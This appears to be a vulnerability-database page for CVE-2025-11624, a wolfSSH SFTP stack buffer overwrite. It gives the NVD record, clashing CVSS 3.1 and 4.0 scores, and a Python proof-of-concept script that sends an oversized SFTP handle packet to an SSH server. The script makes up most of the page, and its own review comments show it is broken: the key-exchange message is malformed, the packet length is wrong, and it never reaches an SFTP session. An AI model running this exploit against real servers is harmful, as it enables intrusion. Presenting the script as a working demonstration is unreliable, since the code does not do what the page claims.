Security Vulnerability Report
CVE-2025-11624 CVSS 9.8 CRITICAL

CVE-2025-11624

Published: 2025-10-21 14:15:47
Last Modified: 2025-12-04 21:21:39

Description

Potential stack buffer overwrite on the SFTP server side when receiving a malicious packet that has a handle size larger than the system handle or file descriptor size, but smaller than max handle size allowed.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The score and vector above are the Primary CVSS 3.1 assessment. The raw JSON further down also carries a Secondary CVSS 4.0 assessment with a base score of 1.8 (LOW: attack requirements PRESENT, privileges required HIGH, user interaction ACTIVE), so the two assessments disagree sharply on how exploitable this is; compare both before prioritising.

Configurations (Affected Products)

cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSH 所有受影响版本(具体版本范围请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11624 wolfSSH SFTP stack buffer overwrite -- PoC as published on this page.
# Per the NVD record reproduced on this page: CWE-787, wolfSSH 1.3.0 through
# 1.4.20 inclusive, fix tracked in wolfSSL/wolfssh PR #834.
#
# NOTE(review): read this script as an illustration of the page's claim, not
# as evidence of exploitability. It stops after sending one SSH_MSG_KEXINIT:
# no DH exchange, no SSH_MSG_NEWKEYS, no authentication, no channel open and
# no subsystem request are performed. The "SFTP" bytes are therefore written
# in plaintext, wrapped in an SSH_MSG_CHANNEL_REQUEST, at a point where a
# conforming server still expects key exchange to continue; they would be
# rejected before any SFTP code runs. Defensive takeaway: upgrade past 1.4.20
# (see PR #834) and treat an SFTP service reachable from untrusted networks as
# exposed until then.
import socket
import struct
import hashlib  # NOTE(review): imported but never used in this script
import os

# Target configuration
TARGET_HOST = "192.168.1.100"
TARGET_PORT = 22

# SSH protocol constants (message numbers as used by RFC 4253 / RFC 4254)
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
# NOTE(review): a subsystem request is an SSH_MSG_CHANNEL_REQUEST (98) whose
# request type is "subsystem"; there is no separate message number, which is
# why this constant duplicates the one above.
SSH_MSG_SUBSYSTEM_REQUEST = 98


def build_ssh_packet(payload_type: int, payload: bytes) -> bytes:
    """Frame *payload* as an unencrypted SSH binary packet (RFC 4253 section 6).

    Layout written: uint32 packet_length, byte padding_length, byte
    payload_type, payload, then random padding. The padding is sized so
    that the whole packet (including the 4-byte length field) is a
    multiple of 8 with at least 4 bytes of padding. No MAC is appended
    and nothing is encrypted, so this framing is only valid before
    SSH_MSG_NEWKEYS.

    Args:
        payload_type: SSH message number written as the first payload byte.
        payload: message body that follows the type byte.

    Returns:
        The framed packet as bytes.

    NOTE(review): the packet_length written is ``packet_length +
    padding_length`` (type byte + payload + padding). RFC 4253 defines
    packet_length as also including the padding_length byte, so the
    value here appears one byte short; a receiver that validates the
    length field would reject the frame.
    """
    packet_length = 1 + len(payload)  # type byte + payload (padding_length byte not counted)
    # Choose padding so 4 (length) + 1 (padding_length) + packet_length + padding
    # is a multiple of 8 ...
    padding_length = 8 - ((packet_length + 5) % 8)
    if padding_length < 4:  # ... with the RFC minimum of 4 bytes of padding
        padding_length += 8
    packet = struct.pack('>I', packet_length + padding_length)
    packet += struct.pack('B', padding_length)
    packet += struct.pack('B', payload_type)
    packet += payload
    packet += os.urandom(padding_length)
    return packet


def send_sftp_handle_overflow(target_host: str, target_port: int) -> None:
    """
    Open a TCP connection, perform the SSH version-string exchange, send one
    KEXINIT, then send one plaintext packet carrying the "SFTP" bytes built
    below; progress is printed to stdout and the socket is closed.

    What the page claims this demonstrates (CVE-2025-11624): a handle field
    larger than the system handle / file descriptor size but smaller than the
    server's maximum allowed handle size. What the code actually does is
    listed step by step in the comments; steps 4 and 5 are not the protocol
    exchange their labels describe, because no key exchange is completed
    first and the packet never reaches an SFTP session.

    Args:
        target_host: host to connect to.
        target_port: TCP port to connect to.

    Returns:
        None. Any exception is caught by the broad ``except Exception`` and
        printed rather than raised, so a caller cannot tell a refused
        connection from a sent packet.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)  # seconds; applies to connect() and recv() below
    try:
        # Step 1: TCP connection
        sock.connect((target_host, target_port))
        print(f"[+] Connected to {target_host}:{target_port}")
        # Step 2: SSH version exchange. The client identification string
        # presents itself as an OpenSSH 8.9p1 client; the server banner is
        # read with a single recv() and only printed.
        sock.send(b"SSH-2.0-OpenSSH_8.9p1\r\n")
        version = sock.recv(256)
        print(f"[+] Server version: {version.strip()}")
        # Step 3: SSH_MSG_KEXINIT, incomplete. RFC 4253 KEXINIT carries a
        # 16-byte cookie, ten name-lists (each with a 4-byte length prefix),
        # a boolean and a reserved uint32. Only two fields are built here,
        # each with a 2-byte prefix (0x0014 = 20 and 0x000a = 10) that does
        # not match the 29- and 7-byte names that follow, so the message is
        # malformed as well as truncated. The server's KEXINIT is never read
        # and no key exchange follows.
        kexinit_payload = b'\x00' * 16  # cookie (all zeros; the RFC calls for random bytes)
        kexinit_payload += b'\x00\x14' + b'diffie-hellman-group14-sha256'
        kexinit_payload += b'\x00\x0a' + b'ssh-rsa'
        # ... additional algorithm negotiation (not implemented)
        sock.send(build_ssh_packet(SSH_MSG_KEXINIT, kexinit_payload))
        # Step 4: channel open and "subsystem" request -- not implemented.
        # Without DH, NEWKEYS and user authentication, nothing below is
        # encrypted or authenticated and there is no SFTP session to carry it.
        # Step 5: the "SFTP" bytes, laid out as: byte 0x66 (102), uint32
        # request id, uint32 handle length, then that many 'A' bytes. They
        # are sent as the body of an SSH_MSG_CHANNEL_REQUEST (98), which is
        # not how SFTP data travels (it goes as channel data on an open
        # session channel).
        # NOTE(review): in the SFTP draft, SSH_FXP_HANDLE (102) is the
        # server's response to an open request, not a client message, so
        # its use here as a request type is questionable.
        sftp_packet_type = b'\x66'  # 102 in decimal = SFTP_FXP_HANDLE response
        request_id = struct.pack('>I', 1)
        # Handle length chosen by the page author: 128, intended to sit
        # between the fd/handle size and the server maximum. The "around
        # 256 bytes" figure below is asserted, not established by anything
        # on this page -- verify against the wolfSSH source before relying on it.
        # Craft handle size: larger than fd size (8 bytes) but < max allowed
        # Typical wolfSSH max handle size is around 256 bytes
        malicious_handle_size = 128  # Triggers the overflow condition
        handle_data = b'A' * malicious_handle_size
        malicious_payload = sftp_packet_type + request_id
        malicious_payload += struct.pack('>I', malicious_handle_size)
        malicious_payload += handle_data
        sock.send(build_ssh_packet(SSH_MSG_SUBSYSTEM_REQUEST, malicious_payload))
        print(f"[+] Sent malicious SFTP packet with handle size: {malicious_handle_size}")
        # NOTE(review): the script never reads a reply, so the line below is
        # printed whether or not the server accepted anything.
        print("[+] If vulnerable, server may crash or execute attacker code")
    except Exception as e:
        # Broad catch: connection refused, timeout and send errors all end
        # up here and are only printed.
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    # WARNING: Only use against systems you own or have permission to test
    send_sftp_handle_overflow(TARGET_HOST, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11624", "sourceIdentifier": "[email protected]", "published": "2025-10-21T14:15:46.813", "lastModified": "2025-12-04T21:21:39.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Potential stack buffer overwrite on the SFTP server side when receiving a malicious packet that has a handle size larger than the system handle or file descriptor size, but smaller than max handle size allowed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.0", "versionEndIncluding": "1.4.20", "matchCriteriaId": "C689A0C6-F8F6-4E09-84BA-C88D71CC356E"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssh/pull/834", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}